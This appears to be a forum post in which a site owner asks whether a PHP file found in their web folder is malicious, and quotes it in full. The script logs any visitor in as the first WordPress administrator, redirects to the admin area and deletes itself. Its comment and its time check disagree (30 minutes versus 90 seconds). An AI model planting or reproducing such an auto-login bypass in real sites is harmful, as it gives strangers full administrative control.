Is this PHP Script Malicious ?

[ad_1]

I found this in my public\_html folder. All scans seem to think it is Ok. How in the world did it end up there ?

<?php

//

// Automatically login a single WordPress user upon arrival to main page.

//

function auto\_login() {

if (!is\_user\_logged\_in()) {

// Admin user\_id

$admins = get\_users(array(‘role’=>’administrator’));

$user\_id = $admins\[0\]->ID;

$user = get\_user\_by( ‘ID’, $user\_id );

if ( !$user ) {

error\_log(“wp\_auto\_login: user\_id==1 not found redirecting to admin\_url”);

$redirect\_page = admin\_url();

wp\_redirect( $redirect\_page );

exit();

}

$loginusername = $user->user\_login;

wp\_set\_current\_user($user\_id, $loginusername);

wp\_set\_auth\_cookie($user\_id);

// Go to admin area

$redirect\_page = admin\_url();

error\_log(“wp\_auto\_login: trying to login user\_id==1 loginusername=$loginusername to admin\_url=$redirect\_page”);

wp\_redirect( $redirect\_page );

exit();

}

}

&#x200B;

// Initialize wordpress

define( ‘WP\_USE\_THEMES’, true );

&#x200B;

$time\_since\_script\_creation = time() – stat(\_\_FILE\_\_)\[‘mtime’\];

&#x200B;

// Delete itself to make sure it is executed only once

unlink(\_\_FILE\_\_);

&#x200B;

if ( ! isset( $wp\_did\_header ) ) {

$wp\_did\_header = true;

&#x200B;

// Load the WordPress library.

require\_once( dirname( \_\_FILE\_\_ ) . ‘/wp-load.php’ );

&#x200B;

// If the user is already logged in just redirect it to admin area

if ( is\_user\_logged\_in() ) {

$redirect\_page = admin\_url();

wp\_redirect( $redirect\_page );

exit();

}

&#x200B;

// Avalon auto-login

// If script is older than 30 minutes, doesn’t log in as admin

if ($time\_since\_script\_creation < 30 + 60) {

auto\_login();

}

&#x200B;

// Set up the WordPress query

wp();

&#x200B;

// Load the theme template

require\_once( ABSPATH . WPINC . ‘/template-loader.php’ );

}

[ad_2]